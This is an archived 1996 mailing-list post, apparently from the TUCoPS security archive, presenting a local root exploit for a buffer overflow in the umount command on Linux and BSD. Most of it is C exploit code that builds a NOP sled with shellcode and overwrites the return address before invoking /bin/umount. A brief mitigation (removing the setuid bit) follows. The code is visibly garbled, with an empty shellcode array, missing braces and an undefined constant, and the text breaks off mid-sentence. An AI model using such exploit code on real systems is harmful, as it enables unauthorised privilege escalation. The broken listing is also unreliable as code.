Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Linux :: General :: linux_um.txt

umount exploit

                         Linux & BSD's umount exploit
   Paulo Jorge Alves Oliveira (
   Tue, 29 Oct 1996 12:38:52 +0100

  there is a bug in berkeley-derived umount, which allows attacker to
get root access (see freebsd-security for details). Here is exploit for
Linux (tested on 2.0.XX), for BSD (tested on FreeBSD 2.1) and a quick

Best regards, Paulo

-------------------------------------- linux_umount_exploit.c ----------
#include <stdio.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024

u_long get_esp()
  __asm__("movl %esp, %eax");


main(int argc, char **argv)
  u_char execshell[] =

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
      printf("can't allocate memory\n");
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   execl(PATH_MOUNT, "umount", buff, NULL);


  Here is a little solution --
    chmod -s /bin/umount
 This way only root can run this command.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH